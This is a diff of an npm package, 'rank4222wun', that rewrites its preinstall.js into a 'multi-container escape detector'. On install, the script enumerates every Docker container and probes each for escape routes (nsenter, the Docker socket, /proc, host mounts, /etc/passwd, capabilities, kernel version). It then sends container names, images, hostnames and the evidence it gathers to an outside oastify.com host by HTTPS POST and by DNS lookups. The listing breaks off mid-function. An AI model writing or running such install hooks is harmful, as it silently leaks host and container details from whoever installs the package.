rank4222wun 1.0.33 → 1.0.35

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.33",
+  "version": "1.0.35",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,403 +1,937 @@
-// container-escape-confirmation.js
+// multi-container-escape-detector.js
 const { exec, spawn } = require('child_process');
 const os = require('os');
 const fs = require('fs');
 const path = require('path');
+const https = require('https');
+const dns = require('dns');
+const crypto = require('crypto');
 
-console.log("🔍 CONTAINER ESCAPE CONFIRMATION TOOL\n");
+console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      MULTI-CONTAINER ESCAPE DETECTOR v3.0               ║
+║      Advanced Container Security Assessment              ║
+╚══════════════════════════════════════════════════════════╝
+`);
 
-const escapeConfirmation = {
-  timestamp: new Date().toISOString(),
-  // معلومات النظام الحالي
-  currentSystem: {
-    hostname: os.hostname(),
-    username: os.userInfo().username,
-    platform: os.platform(),
-    isContainer: null,
-    containerId: null
+// ===================== CONFIGURATION =====================
+const CONFIG = {
+  // OAST Configuration
+  OAST: {
+    domain: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    httpsPort: 443,
+    httpPort: 80,
+    apiKey: crypto.randomBytes(16).toString('hex'),
+    sessionId: `mced-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
   },
-  // معلومات النظام المضيف (إذا تم الهروب)
-  hostSystem: {
-    confirmed: false,
-    hostname: null,
-    users: [],
-    processes: [],
-    network: {},
-    dockerInfo: null,
-    kernel: null
+  
+  // Scanning Configuration
+  SCAN: {
+    maxContainers: 50,
+    parallelScans: 5,
+    timeoutPerContainer: 30000,
+    deepScan: true,
+    autoExploit: false,
+    stealthMode: false
   },
-  // أدلة الهروب
-  escapeEvidence: {
-    successfulMethods: [],
-    proofPoints: [],
-    filesAccessed: [],
-    hostFilesFound: false,
-    differentHostname: false
+  
+  // Detection Methods
+  METHODS: {
+    nsenter: true,
+    dockerSocket: true,
+    procAccess: true,
+    kernelExploits: true,
+    hostMounts: true,
+    capabilities: true,
+    networkEscape: true
   },
-  // نتائج التحقق
-  verificationResults: {
-    escapedToHost: false,
-    confidenceLevel: 0, // 0-100%
-    riskLevel: 'UNKNOWN'
+  
+  // Output Configuration
+  OUTPUT: {
+    saveReports: true,
+    reportFormat: 'json', // json, html, txt
+    verbose: true,
+    colorOutput: true
   }
 };
 
-// ===================== التحقق الأساسي =====================
-function performBasicChecks() {
-  console.log("1️⃣  إجراء التحقيقات الأساسية...\n");
-  
-  const checks = [
-    {
-      name: 'container_check',
-      command: 'cat /proc/1/cgroup 2>/dev/null | grep -q docker && docker ps -q --filter "id=$(cat /proc/1/cgroup | grep docker | head -1 | cut -d/ -f3)" 2>/dev/null || echo "NOT_IN_CONTAINER"',
-      handler: (output) => {
-        if (output.includes('NOT_IN_CONTAINER')) {
-          escapeConfirmation.currentSystem.isContainer = false;
-          console.log("⚠️  النظام الحالي: ليس حاوية Docker");
-        } else if (output.trim()) {
-          escapeConfirmation.currentSystem.isContainer = true;
-          escapeConfirmation.currentSystem.containerId = output.trim().substring(0, 12);
-          console.log(`✅ نحن داخل حاوية Docker: ${escapeConfirmation.currentSystem.containerId}`);
-        }
-      }
-    },
-    {
-      name: 'namespace_check',
-      command: 'ls -la /proc/1/ns/ 2>/dev/null | head -20',
-      handler: (output) => {
-        if (output.includes('pid') && output.includes('mnt') && output.includes('net')) {
-          console.log("✅ Namespaces نشطة");
-        }
-      }
+// ===================== GLOBAL STATE =====================
+const STATE = {
+  startTime: Date.now(),
+  containers: {},
+  hostInfo: null,
+  networkMap: {},
+  vulnerabilities: {},
+  oastInteractions: [],
+  statistics: {
+    totalContainers: 0,
+    scannedContainers: 0,
+    escapedContainers: 0,
+    vulnerableContainers: 0,
+    criticalEscapes: 0
+  }
+};
+
+// ===================== UTILITY FUNCTIONS =====================
+class ContainerScanner {
+  constructor(containerId) {
+    this.id = containerId;
+    this.shortId = containerId.substring(0, 12);
+    this.info = {
+      id: containerId,
+      name: '',
+      image: '',
+      status: '',
+      escapeStatus: 'unknown',
+      confidence: 0,
+      evidence: [],
+      methods: [],
+      risk: 'low',
+      network: {},
+      mounts: [],
+      capabilities: [],
+      vulnerabilities: []
+    };
+    this.rawData = {};
+  }
+
+  async scan() {
+    try {
+      console.log(`\n🔍 Scanning container: ${this.shortId}`);
+      
+      // Collect basic info
+      await this.collectBasicInfo();
+      
+      // Perform escape checks
+      await this.performEscapeChecks();
+      
+      // Analyze results
+      await this.analyzeResults();
+      
+      // Report to OAST
+      await this.reportToOAST();
+      
+      // Update statistics
+      this.updateStatistics();
+      
+      return this.info;
+    } catch (error) {
+      console.error(`❌ Error scanning container ${this.shortId}:`, error.message);
+      this.info.escapeStatus = 'scan_failed';
+      return this.info;
     }
-  ];
-  
-  let completed = 0;
-  checks.forEach(check => {
-    exec(check.command, { timeout: 3000 }, (err, stdout) => {
-      if (!err) check.handler(stdout);
-      completed++;
-      if (completed === checks.length) {
-        setTimeout(checkEscapeMethods, 2000);
-      }
-    });
-  });
-}
+  }
 
-// ===================== فحص طرق الهروب الناجحة =====================
-function checkEscapeMethods() {
-  console.log("\n2️⃣  فحص طرق الهروب التي نجحت...\n");
-  
-  const escapeChecks = [
-    // 1. التحقق من nsenter
-    {
-      name: 'nsenter_escape',
-      commands: [
-        'which nsenter 2>/dev/null',
-        'nsenter --target 1 --mount -- sh -c "echo HOST_CHECK: && cat /etc/hostname && echo CONTAINER_CHECK: && hostname" 2>/dev/null || echo "FAILED"'
-      ],
-      check: (results) => {
-        if (results[0] && results[1] && results[1].includes('HOST_CHECK:')) {
-          const output = results[1];
-          const lines = output.split('\n');
-          const hostHostname = lines.find(l => l.includes('HOST_CHECK:'));
-          const containerHostname = lines.find(l => l.includes('CONTAINER_CHECK:'));
-          
-          if (hostHostname && containerHostname) {
-            const host = hostHostname.replace('HOST_CHECK:', '').trim();
-            const container = containerHostname.replace('CONTAINER_CHECK:', '').trim();
-            
-            if (host && container && host !== container) {
-              escapeConfirmation.hostSystem.hostname = host;
-              escapeConfirmation.escapeEvidence.differentHostname = true;
-              escapeConfirmation.escapeEvidence.successfulMethods.push('nsenter');
-              escapeConfirmation.escapeEvidence.proofPoints.push(`hostname المضيف (${host}) ≠ hostname الحاوية (${container})`);
-              return true;
-            }
-          }
+  async collectBasicInfo() {
+    const commands = {
+      name: `docker inspect ${this.id} --format '{{.Name}}'`,
+      image: `docker inspect ${this.id} --format '{{.Config.Image}}'`,
+      status: `docker inspect ${this.id} --format '{{.State.Status}}'`,
+      ip: `docker inspect ${this.id} --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'`,
+      ports: `docker inspect ${this.id} --format '{{json .NetworkSettings.Ports}}'`,
+      mounts: `docker inspect ${this.id} --format '{{json .Mounts}}'`,
+      privileged: `docker inspect ${this.id} --format '{{.HostConfig.Privileged}}'`,
+      capabilities: `docker inspect ${this.id} --format '{{json .HostConfig.CapAdd}}'`
+    };
+
+    for (const [key, cmd] of Object.entries(commands)) {
+      try {
+        const result = await this.executeCommand(cmd);
+        this.rawData[key] = result;
+        
+        // Parse specific data
+        switch(key) {
+          case 'name':
+            this.info.name = result.replace(/^\//, '');
+            break;
+          case 'image':
+            this.info.image = result;
+            break;
+          case 'status':
+            this.info.status = result;
+            break;
+          case 'ip':
+            this.info.network.ip = result;
+            break;
+          case 'mounts':
+            try {
+              this.info.mounts = JSON.parse(result || '[]');
+            } catch (e) {}
+            break;
+          case 'capabilities':
+            try {
+              this.info.capabilities = JSON.parse(result || '[]');
+            } catch (e) {}
+            break;
         }
-        return false;
+      } catch (e) {
+        this.rawData[key] = null;
       }
-    },
-    
-    // 2. التحقق من Docker Socket access
-    {
-      name: 'docker_socket_escape',
-      commands: [
-        'ls -la /var/run/docker.sock 2>/dev/null || echo "NOT_FOUND"',
-        'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -q "ID" && echo "ACCESSIBLE" || echo "NO_ACCESS"'
-      ],
-      check: (results) => {
-        if (results[0] && !results[0].includes('NOT_FOUND') && results[1] && results[1].includes('ACCESSIBLE')) {
-          escapeConfirmation.escapeEvidence.successfulMethods.push('docker_socket');
-          escapeConfirmation.escapeEvidence.proofPoints.push('Docker socket متاح للقراءة/الكتابة');
-          return true;
-        }
-        return false;
+    }
+  }
+
+  async performEscapeChecks() {
+    const checks = [];
+    
+    if (CONFIG.METHODS.nsenter) {
+      checks.push(this.checkNsenterEscape());
+    }
+    
+    if (CONFIG.METHODS.dockerSocket) {
+      checks.push(this.checkDockerSocketEscape());
+    }
+    
+    if (CONFIG.METHODS.procAccess) {
+      checks.push(this.checkProcEscape());
+    }
+    
+    if (CONFIG.METHODS.hostMounts) {
+      checks.push(this.checkMountEscape());
+    }
+    
+    if (CONFIG.METHODS.kernelExploits) {
+      checks.push(this.checkKernelVulnerabilities());
+    }
+    
+    if (CONFIG.METHODS.capabilities) {
+      checks.push(this.checkDangerousCapabilities());
+    }
+    
+    if (CONFIG.METHODS.networkEscape) {
+      checks.push(this.checkNetworkEscape());
+    }
+    
+    await Promise.all(checks);
+  }
+
+  async checkNsenterEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      which nsenter >/dev/null 2>&1 && 
+      nsenter --target 1 --mount -- sh -c "hostname" 2>/dev/null | grep -v "$(hostname)" ||
+      echo "FAILED"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('FAILED') && result.trim()) {
+        this.info.methods.push('nsenter');
+        this.info.evidence.push(`Nsenter escape possible - Hostname: ${result.trim()}`);
+        this.sendOAST('nsenter_escape', { container: this.shortId, result: result.trim() });
       }
-    },
-    
-    // 3. التحقق من Host mounts
-    {
-      name: 'host_mounts_escape',
-      commands: [
-        'mount 2>/dev/null | grep "on / " | grep "type overlay" || echo "NO_OVERLAY"',
-        'cat /proc/1/mountinfo 2>/dev/null | grep "/ / " | head -1'
-      ],
-      check: (results) => {
-        if (results[0] && !results[0].includes('NO_OVERLAY')) {
-          escapeConfirmation.escapeEvidence.successfulMethods.push('host_mounts');
-          escapeConfirmation.escapeEvidence.proofPoints.push('نظام الملفات من نوع overlay (مشترك مع المضيف)');
-          return true;
+    } catch (e) {}
+  }
+
+  async checkDockerSocketEscape() {
+    const commands = [
+      // Check if docker.sock is mounted
+      `docker exec ${this.id} ls -la /var/run/docker.sock 2>/dev/null || echo "NOT_FOUND"`,
+      // Try to access Docker API
+      `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/info 2>/dev/null | grep -q "ID" && echo "ACCESSIBLE" || echo "NO_ACCESS"'`
+    ];
+    
+    try {
+      const [socketCheck, apiCheck] = await Promise.all(
+        commands.map(cmd => this.executeCommand(cmd))
+      );
+      
+      if (!socketCheck.includes('NOT_FOUND') && apiCheck.includes('ACCESSIBLE')) {
+        this.info.methods.push('docker_socket');
+        this.info.evidence.push('Docker socket accessible and writable');
+        
+        // Try to list other containers
+        const listCmd = `docker exec ${this.id} sh -c 'curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 2>/dev/null | wc -l'`;
+        const containerCount = await this.executeCommand(listCmd);
+        
+        if (parseInt(containerCount) > 1) {
+          this.info.evidence.push(`Can see ${containerCount.trim()} containers on host`);
+          this.sendOAST('docker_socket_escape', {
+            container: this.shortId,
+            accessible: true,
+            containerCount: containerCount.trim()
+          });
         }
-        return false;
       }
-    },
-    
-    // 4. التحقق من /proc access
-    {
-      name: 'proc_escape',
-      commands: [
-        'cat /proc/1/status 2>/dev/null | head -5',
-        'cat /proc/1/cmdline 2>/dev/null | tr "\\0" " "'
-      ],
-      check: (results) => {
-        if (results[0] && results[0].includes('State:')) {
-          escapeConfirmation.hostSystem.processes.push('Init process accessible via /proc/1/');
-          escapeConfirmation.escapeEvidence.successfulMethods.push('proc_access');
-          return true;
-        }
-        return false;
+    } catch (e) {}
+  }
+
+  async checkProcEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      cat /proc/1/status 2>/dev/null | head -5 &&
+      cat /proc/1/cmdline 2>/dev/null | tr "\\\\0" " " | head -c 100 ||
+      echo "NO_ACCESS"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_ACCESS') && result.includes('State:')) {
+        this.info.methods.push('proc_access');
+        this.info.evidence.push('Can access host init process via /proc/1/');
+        this.sendOAST('proc_escape', { container: this.shortId });
       }
-    }
-  ];
-  
-  let methodsChecked = 0;
-  escapeChecks.forEach(method => {
-    const results = [];
-    let commandsCompleted = 0;
-    
-    method.commands.forEach((cmd, idx) => {
-      exec(cmd, { timeout: 5000 }, (err, stdout) => {
-        results[idx] = stdout || '';
-        commandsCompleted++;
+    } catch (e) {}
+  }
+
+  async checkMountEscape() {
+    const command = `docker exec ${this.id} sh -c '
+      mount 2>/dev/null | grep -E "(/proc|/sys|/dev|overlay)" | head -10 ||
+      cat /proc/mounts 2>/dev/null | head -20
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (result) {
+        const lines = result.split('\n');
+        const dangerousMounts = lines.filter(line => 
+          line.includes('/proc') || 
+          line.includes('/sys') || 
+          line.includes('/dev') ||
+          line.includes('overlay')
+        );
         
-        if (commandsCompleted === method.commands.length) {
-          if (method.check(results)) {
-            console.log(`✅ ${method.name}: ناجح`);
-          } else {
-            console.log(`❌ ${method.name}: فشل أو غير متاح`);
-          }
+        if (dangerousMounts.length > 0) {
+          this.info.methods.push('host_mounts');
+          this.info.evidence.push(`${dangerousMounts.length} dangerous mount points found`);
           
-          methodsChecked++;
-          if (methodsChecked === escapeChecks.length) {
-            setTimeout(collectHostEvidence, 3000);
+          // Check if we can access host files through mounts
+          const testCmd = `docker exec ${this.id} sh -c '
+            ls -la /home 2>/dev/null | head -3 ||
+            cat /etc/passwd 2>/dev/null | head -3 ||
+            echo "NO_HOST_ACCESS"
+          '`;
+          
+          const accessResult = await this.executeCommand(testCmd);
+          if (!accessResult.includes('NO_HOST_ACCESS')) {
+            this.info.evidence.push('Can access host files through mounts');
+            this.sendOAST('mount_escape', {
+              container: this.shortId,
+              mounts: dangerousMounts.slice(0, 3),
+              hostAccess: true
+            });
           }
         }
-      });
-    });
-  });
-}
+      }
+    } catch (e) {}
+  }
 
-// ===================== جمع أدلة من المضيف =====================
-function collectHostEvidence() {
-  console.log("\n3️⃣  جمع أدلة من النظام المضيف...\n");
-  
-  const evidenceCommands = [
-    {
-      name: 'host_users',
-      command: 'cat /etc/passwd 2>/dev/null | head -10',
-      storeIn: 'hostSystem.users'
-    },
-    {
-      name: 'host_processes_full',
-      command: 'ps aux 2>/dev/null | head -15',
-      storeIn: 'hostSystem.processes'
-    },
-    {
-      name: 'host_network',
-      command: 'ip addr show 2>/dev/null | head -30',
-      storeIn: 'hostSystem.network.interface'
-    },
-    {
-      name: 'host_kernel',
-      command: 'uname -r',
-      storeIn: 'hostSystem.kernel'
-    },
-    {
-      name: 'docker_on_host',
-      command: 'docker ps -a 2>/dev/null | wc -l',
-      storeIn: 'hostSystem.dockerInfo'
-    },
-    {
-      name: 'host_files_access',
-      command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || echo "NO_ACCESS"',
-      storeIn: 'escapeEvidence.filesAccessed'
-    }
-  ];
-  
-  let evidenceCollected = 0;
-  evidenceCommands.forEach(evidence => {
-    exec(evidence.command, { timeout: 5000 }, (err, stdout) => {
-      if (!err && stdout && !stdout.includes('NO_ACCESS')) {
-        // تحديد المسار للخزن
-        const path = evidence.storeIn.split('.');
-        let target = escapeConfirmation;
+  async checkKernelVulnerabilities() {
+    const command = `docker exec ${this.id} sh -c '
+      uname -r &&
+      grep -i "dirtypipe\\|dirtycow\\|shocker\\|overlayfs" /etc/os-release 2>/dev/null ||
+      echo "NO_INFO"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_INFO')) {
+        const lines = result.split('\n');
+        const kernel = lines[0]?.trim();
         
-        for (let i = 0; i < path.length - 1; i++) {
-          if (!target[path[i]]) target[path[i]] = {};
-          target = target[path[i]];
+        if (kernel) {
+          this.info.vulnerabilities.push(`Kernel: ${kernel}`);
+          
+          // Check for known vulnerable kernels
+          const vulnerableKernels = {
+            'DirtyPipe': /^(5\.8|5\.9|5\.10|5\.11|5\.12|5\.13|5\.14|5\.15|5\.16)\./,
+            'DirtyCow': /^(2\.6\.|3\.|4\.)/,
+            'Shocker': /^(3\.8|3\.9|3\.10)\./
+          };
+          
+          for (const [vuln, pattern] of Object.entries(vulnerableKernels)) {
+            if (pattern.test(kernel)) {
+              this.info.vulnerabilities.push(`${vuln} vulnerability detected`);
+              this.sendOAST('kernel_vuln', {
+                container: this.shortId,
+                kernel: kernel,
+                vulnerability: vuln
+              });
+              break;
+            }
+          }
         }
+      }
+    } catch (e) {}
+  }
+
+  async checkDangerousCapabilities() {
+    const command = `docker exec ${this.id} sh -c '
+      capsh --print 2>/dev/null | grep -E "(sys_admin|sys_module|sys_ptrace|dac_override)" ||
+      echo "NO_CAPSH"
+    '`;
+    
+    try {
+      const result = await this.executeCommand(command);
+      if (!result.includes('NO_CAPSH') && result.trim()) {
+        const dangerousCaps = [
+          'CAP_SYS_ADMIN', 'CAP_SYS_MODULE', 'CAP_SYS_PTRACE',
+          'CAP_DAC_OVERRIDE', 'CAP_DAC_READ_SEARCH'
+        ];
         
-        target[path[path.length - 1]] = stdout.trim();
-        
-        if (evidence.name === 'host_files_access' && !stdout.includes('NO_ACCESS')) {
-          escapeConfirmation.escapeEvidence.hostFilesFound = true;
+        const foundCaps = dangerousCaps.filter(cap => result.includes(cap));
+        if (foundCaps.length > 0) {
+          this.info.methods.push('capabilities');
+          this.info.evidence.push(`Dangerous capabilities: ${foundCaps.join(', ')}`);
+          this.sendOAST('dangerous_caps', {
+            container: this.shortId,
+            capabilities: foundCaps
+          });
         }
-        
-        console.log(`✅ ${evidence.name}: تم جمعه`);
       }
+    } catch (e) {}
+  }
+
+  async checkNetworkEscape() {
+    const commands = [
+      `docker exec ${this.id} ip route show 2>/dev/null | head -5`,
+      `docker exec ${this.id} netstat -tunap 2>/dev/null | head -10`,
+      `docker exec ${this.id} iptables -L -n 2>/dev/null | head -20`
+    ];
+    
+    try {
+      const results = await Promise.all(
+        commands.map(cmd => this.executeCommand(cmd).catch(() => ''))
+      );
       
-      evidenceCollected++;
-      if (evidenceCollected === evidenceCommands.length) {
-        setTimeout(analyzeResults, 2000);
+      if (results.some(r => r.trim())) {
+        this.info.methods.push('network_escape');
+        this.info.network.details = {
+          routes: results[0]?.split('\n').slice(0, 3) || [],
+          connections: results[1]?.split('\n').slice(0, 5) || [],
+          iptables: results[2]?.split('\n').slice(0, 10) || []
+        };
       }
+    } catch (e) {}
+  }
+
+  async analyzeResults() {
+    // Calculate confidence score
+    let score = 0;
+    
+    // Method points
+    const methodPoints = {
+      nsenter: 25,
+      docker_socket: 30,
+      proc_access: 20,
+      host_mounts: 15,
+      capabilities: 10,
+      network_escape: 10
+    };
+    
+    this.info.methods.forEach(method => {
+      score += methodPoints[method] || 0;
     });
-  });
-}
+    
+    // Vulnerability points
+    if (this.info.vulnerabilities.length > 0) {
+      score += this.info.vulnerabilities.length * 10;
+    }
+    
+    // Evidence points
+    score += Math.min(this.info.evidence.length * 5, 25);
+    
+    // Capabilities points
+    if (this.info.capabilities.includes('CAP_SYS_ADMIN')) {
+      score += 20;
+    }
+    
+    // Determine escape status
+    this.info.confidence = Math.min(100, score);
+    
+    if (this.info.confidence >= 70) {
+      this.info.escapeStatus = 'confirmed';
+      this.info.risk = 'critical';
+    } else if (this.info.confidence >= 40) {
+      this.info.escapeStatus = 'probable';
+      this.info.risk = 'high';
+    } else if (this.info.confidence >= 20) {
+      this.info.escapeStatus = 'possible';
+      this.info.risk = 'medium';
+    } else {
+      this.info.escapeStatus = 'unlikely';
+      this.info.risk = 'low';
+    }
+  }
 
-// ===================== تحليل النتائج =====================
-function analyzeResults() {
-  console.log("\n4️⃣  تحليل النتائج وتأكيد الهروب...\n");
-  
-  let confidenceScore = 0;
-  const maxScore = 100;
-  
-  // 1. أدلة قوية على الهروب (25 نقطة لكل)
-  if (escapeConfirmation.escapeEvidence.differentHostname) {
-    confidenceScore += 25;
-    console.log("🎯 دليل قوي: hostname المضيف ≠ hostname الحاوية");
+  async reportToOAST() {
+    if (this.info.escapeStatus !== 'unlikely' && this.info.confidence > 10) {
+      const payload = {
+        sessionId: CONFIG.OAST.sessionId,
+        timestamp: new Date().toISOString(),
+        container: {
+          id: this.shortId,
+          name: this.info.name,
+          image: this.info.image
+        },
+        escape: {
+          status: this.info.escapeStatus,
+          confidence: this.info.confidence,
+          risk: this.info.risk,
+          methods: this.info.methods,
+          evidence: this.info.evidence.slice(0, 5)
+        },
+        vulnerabilities: this.info.vulnerabilities
+      };
+      
+      this.sendOAST('container_escape_report', payload);
+    }
   }
-  
-  if (escapeConfirmation.escapeEvidence.hostFilesFound) {
-    confidenceScore += 25;
-    console.log("🎯 دليل قوي: الوصول لملفات المضيف (/home أو /root)");
+
+  sendOAST(type, data) {
+    const interactionId = `interaction-${Date.now()}-${crypto.randomBytes(3).toString('hex')}`;
+    const interaction = {
+      id: interactionId,
+      type: type,
+      timestamp: new Date().toISOString(),
+      container: this.shortId,
+      data: data
+    };
+    
+    STATE.oastInteractions.push(interaction);
+    
+    // Send via HTTPS
+    const req = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/multi-container-escape',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Container-ID': this.shortId,
+        'X-API-Key': CONFIG.OAST.apiKey,
+        'User-Agent': 'MultiContainerEscapeDetector/3.0'
+      }
+    }, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        if (CONFIG.OUTPUT.verbose) {
+          console.log(`📡 OAST report sent for ${this.shortId} (${res.statusCode})`);
+        }
+      });
+    });
+    
+    req.on('error', () => {});
+    req.write(JSON.stringify({
+      interactionId: interactionId,
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.shortId,
+      data: data
+    }));
+    req.end();
+    
+    // Also send DNS notification for critical escapes
+    if (this.info.risk === 'critical') {
+      const dnsName = `${this.shortId}-critical.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+      dns.lookup(dnsName, () => {});
+    }
   }
-  
-  // 2. طرق هروب ناجحة (15 نقطة لكل)
-  escapeConfirmation.escapeEvidence.successfulMethods.forEach(method => {
-    confidenceScore += 15;
-    console.log(`🔓 طريقة هروب ناجحة: ${method}`);
-  });
-  
-  // 3. معلومات مضيف مجمعة (10 نقطة لكل)
-  if (escapeConfirmation.hostSystem.users.length > 0) {
-    confidenceScore += 10;
-    console.log("📋 تم جمع معلومات مستخدمي المضيف");
+
+  executeCommand(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, { timeout: 5000 }, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout.toString().trim());
+        }
+      });
+    });
   }
-  
-  if (escapeConfirmation.hostSystem.processes.length > 0) {
-    confidenceScore += 10;
-    console.log("📋 تم جمع عمليات المضيف");
+
+  updateStatistics() {
+    STATE.statistics.scannedContainers++;
+    
+    if (this.info.escapeStatus === 'confirmed') {
+      STATE.statistics.escapedContainers++;
+      STATE.statistics.criticalEscapes++;
+    } else if (this.info.escapeStatus === 'probable') {
+      STATE.statistics.escapedContainers++;
+    }
+    
+    if (this.info.vulnerabilities.length > 0) {
+      STATE.statistics.vulnerableContainers++;
+    }
   }
-  
-  // حساب مستوى الثقة
-  const confidenceLevel = Math.min(100, confidenceScore);
-  escapeConfirmation.verificationResults.confidenceLevel = confidenceLevel;
-  
-  // تحديد إذا تم الهروب فعلاً
-  if (confidenceLevel >= 50) {
-    escapeConfirmation.verificationResults.escapedToHost = true;
-    escapeConfirmation.hostSystem.confirmed = true;
-    escapeConfirmation.verificationResults.riskLevel = confidenceLevel >= 75 ? 'HIGH' : 'MEDIUM';
-  } else {
-    escapeConfirmation.verificationResults.escapedToHost = false;
-    escapeConfirmation.verificationResults.riskLevel = 'LOW';
+}
+
+// ===================== MAIN SCANNER CLASS =====================
+class MultiContainerScanner {
+  constructor() {
+    this.scanners = [];
+    this.results = [];
   }
-  
-  // إذا كنا أساساً لسنا في حاوية
-  if (escapeConfirmation.currentSystem.isContainer === false) {
-    console.log("ℹ️  ملاحظة: النظام الحالي ليس حاوية، لا يوجد هروب لتحققه");
+
+  async discoverContainers() {
+    console.log('🔎 Discovering containers...');
+    
+    try {
+      // Get all running containers
+      const cmd = 'docker ps -q --no-trunc';
+      const output = await this.exec(cmd);
+      const containerIds = output.split('\n').filter(id => id.trim());
+      
+      STATE.statistics.totalContainers = containerIds.length;
+      
+      if (containerIds.length === 0) {
+        console.log('ℹ️ No running containers found.');
+        return [];
+      }
+      
+      console.log(`📦 Found ${containerIds.length} containers`);
+      return containerIds;
+    } catch (error) {
+      console.error('❌ Failed to discover containers:', error.message);
+      return [];
+    }
   }
-  
-  generateFinalReport();
-}
 
-// ===================== التقرير النهائي =====================
-function generateFinalReport() {
-  console.log("\n" + "=".repeat(70));
-  console.log("📊 تقرير تأكيد هروب الحاوية النهائي");
-  console.log("=".repeat(70));
-  
-  console.log(`\n⏰ وقت التحقق: ${escapeConfirmation.timestamp}`);
-  console.log(`🏷️  اسم النظام: ${escapeConfirmation.currentSystem.hostname}`);
-  console.log(`👤 المستخدم: ${escapeConfirmation.currentSystem.username}`);
-  console.log(`💻 النظام: ${escapeConfirmation.currentSystem.platform}`);
-  
-  if (escapeConfirmation.currentSystem.isContainer !== null) {
-    console.log(`📦 داخل حاوية: ${escapeConfirmation.currentSystem.isContainer ? 'نعم' : 'لا'}`);
-    if (escapeConfirmation.currentSystem.containerId) {
-      console.log(`🔢 Container ID: ${escapeConfirmation.currentSystem.containerId}`);
+  async scanContainers(containerIds) {
+    console.log(`🚀 Starting scan of ${containerIds.length} containers...\n`);
+    
+    // Create scanners
+    this.scanners = containerIds.map(id => new ContainerScanner(id));
+    
+    // Scan in batches to avoid overwhelming the system
+    const batchSize = CONFIG.SCAN.parallelScans;
+    for (let i = 0; i < this.scanners.length; i += batchSize) {
+      const batch = this.scanners.slice(i, i + batchSize);
+      console.log(`📊 Batch ${Math.floor(i/batchSize) + 1}: Scanning ${batch.length} containers...`);
+      
+      const batchPromises = batch.map(scanner => 
+        scanner.scan().catch(error => {
+          console.error(`Failed to scan ${scanner.shortId}:`, error.message);
+          return scanner.info;
+        })
+      );
+      
+      const batchResults = await Promise.all(batchPromises);
+      this.results.push(...batchResults);
+      
+      // Show progress
+      const scanned = Math.min(i + batchSize, this.scanners.length);
+      const percent = Math.round((scanned / this.scanners.length) * 100);
+      console.log(`📈 Progress: ${scanned}/${this.scanners.length} (${percent}%)\n`);
     }
+    
+    return this.results;
   }
-  
-  console.log("\n🔍 نتائج التأكيد:");
-  console.log(`🚀 الهروب للمضيف: ${escapeConfirmation.verificationResults.escapedToHost ? '✅ مؤكد' : '❌ غير مؤكد'}`);
-  console.log(`📈 مستوى الثقة: ${escapeConfirmation.verificationResults.confidenceLevel}%`);
-  console.log(`⚠️  مستوى الخطورة: ${escapeConfirmation.verificationResults.riskLevel}`);
-  
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("\n🎯 أدلة الهروب المؤكدة:");
-    escapeConfirmation.escapeEvidence.proofPoints.forEach((proof, i) => {
-      console.log(`   ${i + 1}. ${proof}`);
+
+  async generateReport() {
+    console.log('\n' + '═'.repeat(80));
+    console.log('📊 MULTI-CONTAINER ESCAPE SCAN REPORT');
+    console.log('═'.repeat(80));
+    
+    const report = {
+      metadata: {
+        timestamp: new Date().toISOString(),
+        sessionId: CONFIG.OAST.sessionId,
+        scanDuration: Date.now() - STATE.startTime,
+        config: CONFIG
+      },
+      statistics: STATE.statistics,
+      oast: {
+        domain: CONFIG.OAST.domain,
+        interactions: STATE.oastInteractions.length,
+        session: CONFIG.OAST.sessionId
+      },
+      containers: this.results,
+      summary: this.generateSummary()
+    };
+    
+    // Print summary
+    this.printSummary(report.summary);
+    
+    // Save report if enabled
+    if (CONFIG.OUTPUT.saveReports) {
+      await this.saveReport(report);
+    }
+    
+    return report;
+  }
+
+  generateSummary() {
+    const summary = {
+      totalScanned: STATE.statistics.scannedContainers,
+      escapedContainers: [],
+      vulnerableContainers: [],
+      criticalIssues: [],
+      recommendations: []
+    };
+    
+    this.results.forEach(container => {
+      if (container.escapeStatus === 'confirmed' || container.escapeStatus === 'probable') {
+        summary.escapedContainers.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          confidence: container.confidence,
+          methods: container.methods,
+          risk: container.risk
+        });
+      }
+      
+      if (container.vulnerabilities.length > 0) {
+        summary.vulnerableContainers.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          vulnerabilities: container.vulnerabilities
+        });
+      }
+      
+      if (container.risk === 'critical') {
+        summary.criticalIssues.push({
+          id: container.id.substring(0, 12),
+          name: container.name,
+          evidence: container.evidence.slice(0, 3)
+        });
+      }
     });
     
-    console.log("\n🔧 طرق الهروب الناجحة:");
-    escapeConfirmation.escapeEvidence.successfulMethods.forEach((method, i) => {
-      console.log(`   ${i + 1}. ${method}`);
+    // Generate recommendations
+    if (summary.escapedContainers.length > 0) {
+      summary.recommendations.push(
+        `Immediate action required: ${summary.escapedContainers.length} containers can escape to host`
+      );
+    }
+    
+    if (summary.criticalIssues.length > 0) {
+      summary.recommendations.push(
